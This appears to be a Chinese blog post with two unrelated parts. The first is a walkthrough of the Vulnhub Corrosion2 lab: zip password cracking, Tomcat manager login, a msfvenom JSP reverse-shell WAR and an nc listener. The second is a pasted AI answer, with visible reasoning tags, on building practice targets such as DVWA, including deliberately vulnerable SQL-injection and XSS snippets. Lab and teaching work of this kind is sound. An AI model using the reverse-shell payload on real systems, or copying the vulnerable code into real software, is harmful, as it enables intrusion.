Corrosion2靶机

通过nmap进行靶机目标网段(192.168.37.22/24)的存活主机探测

排除到已知ip的机器之后,确认靶机的的ip为192.168.37.131

使用nmap探测主机开放端口及对应服务

确定靶机开放了22、80、8080端口,对应为ssh远程服务和两个web服务,分别打开对应web界面

按照靶机作者枚举的提示,本次使用dirsearch工具进行扫描两个web服务,使用默认字典的进行爆破

readme中说明了系统管理员提供了一些有用的文件,并且应该被加密了

下载backup.zip文件之后,发现这个zip文件是被加密,推测这个文件就是readme.txt中说到的文件。尝试使用fcrackzip利用字典进行破解,成功破解出密码,获取出密码之后,解压zip文件

发现里面存放的tomcat-users.xml文件记录的系统tomcat的manager管理员账户密码

用压缩包中记录的账号密码登录,网站的manager控制后台,发现可以部署直接在线部署war包,可以利用这个点进行shell反弹

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.37.22" LPORT=8888 -f war > jsp_java.war

war构建完成之后,上传war包进行利用

nc -lvp 8888

点击箭头处访问对应连接就能获取到反弹shell了,成功获取到shell

<think>好的,我需要帮用户了解如何制作或搭建用于安全测试的Web靶机。首先,我应该回顾一下用户提供的引用内容,看看里面有没有相关的信息。引用1提到DVWA是一个用于学习的Web演练平台,而引用2详细描述了如何在Kali Linux下搭建DVWA,包括所需的环境如Apache、MySQL和PHP。这说明搭建现有靶机可能需要配置这些服务。引用4和5则提到了使用Vulnhub的靶机,并涉及渗透测试的步骤,可能涉及到下载和配置虚拟机环境。 用户的问题是关于制作或搭建Web靶机,这可能包括两种途径:一种是使用现有的靶机平台(如DVWA)进行搭建,另一种是自行开发具有漏洞的Web应用作为靶机。根据引用中的信息,现有的靶机如DVWA已经设计好了常见的漏洞,比如SQL注入、XSS等,因此推荐用户先使用这些现有的解决方案,再考虑自定义开发。 接下来,我需要整理搭建现有靶机的步骤。根据引用2,DVWA在Kali Linux下搭建方便,因为所需环境已经预装。步骤可能包括安装DVWA代码、配置数据库、设置文件权限等。同时,引用4和5提到Vulnhub靶机的下载和虚拟机配置,这部分需要用户下载OVA文件,使用VirtualBox或VMware导入,然后启动靶机环境。 对于自行开发靶机,可能需要设置不同的漏洞场景,比如SQL注入、文件上传漏洞等,这需要一定的Web开发知识和安全意识,确保漏洞可控,不会造成真实的安全风险。引用3提到渗透测试的流程,包括手动测试和工具辅助,这可能对开发靶机时的漏洞设计有帮助,确保漏洞的可利用性。 还需要考虑用户的需求层次。如果是初学者,建议从搭建现有靶机开始,比如DVWA或OWASP Juice Shop,这些项目文档齐全,社区支持好。如果有一定经验,可以尝试从Vulnhub下载更复杂的靶机,或者自行构建漏洞环境。 最后,我需要确保回答结构清晰,分步骤说明搭建现有靶机和自行开发的方法,并给出相关资源链接或引用。同时,生成的问题需要围绕搭建步骤、工具选择、漏洞设计等方面,帮助用户进一步探索。</think>### 如何制作或搭建用于安全测试的Web靶机? #### 一、搭建现有开源靶机(推荐初学者) 1. **选择靶机平台** 推荐使用成熟的漏洞演练项目,例如: - **DVWA**:专为Web漏洞教学设计,包含SQL注入、XSS、文件上传等漏洞[^2]。 - **OWASP Juice Shop**:聚焦现代Web应用漏洞(如API滥用、逻辑漏洞)。 - **Vulnhub靶机**:提供虚拟机镜像(如Corrosion2、DC-8),覆盖综合渗透场景[^4][^5]。 2. **环境准备** - **安装Web服务器**:如Apache、Nginx。 - **配置数据库**:如MySQL、MariaDB。 - **安装PHP/Python**:根据靶机要求选择语言环境。 - **Kali Linux集成**:Kali已预装Apache、MySQL和PHP,可直接部署DVWA等靶机[^2]。 3. **部署步骤(以DVWA为例)** ```bash # 下载DVWA源码 git clone https://github.com/digininja/DVWA.git # 复制到Web目录 sudo cp -r DVWA /var/www/html/ # 配置数据库 mysql -u root -p CREATE DATABASE dvwa; GRANT ALL ON dvwa.* TO 'dvwa'@'localhost' IDENTIFIED BY 'password'; # 修改配置文件 cd /var/www/html/DVWA/config cp config.inc.php.dist config.inc.php # 调整文件权限 chmod 755 /var/www/html/DVWA/hackable/uploads/ ``` 完成后通过浏览器访问 `http://localhost/DVWA` 完成初始化[^2]。 --- #### 二、自行开发定制化靶机(需开发基础) 1. **设计漏洞场景** - **常见漏洞类型**: - SQL注入(如未过滤的用户输入)[^3] - XSS(反射型、存储型) - 文件上传漏洞(未校验文件类型) - 逻辑漏洞(如权限绕过、支付金额篡改) 2. **技术实现** - **后端框架**:使用PHP、Python(Flask/Django)或Node.js模拟漏洞。 - **数据库交互**:故意使用不安全查询,例如: ```php $id = $_GET['id']; $sql = "SELECT * FROM users WHERE id = $id"; // 未过滤的SQL注入点 ``` - **前端设计**:构造可触发XSS的输入表单,例如: ```html <input type="text" name="comment" value="<?php echo $_POST['comment']; ?>"> ``` 3. **安全隔离** - 使用虚拟机或Docker容器隔离靶机环境。 - 禁用外部网络访问,防止漏洞被恶意利用。 --- #### 三、工具与资源推荐 1. **现成工具** - **Metasploitable**:预置漏洞的Linux镜像。 - **bWAPP**:包含100+漏洞场景的PHP靶机2. **学习资源** - Vulnhub靶机教程(如Corrosion2、DC-8渗透步骤)[^4]。 - OWASP Top 10漏洞清单(指导漏洞设计)。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值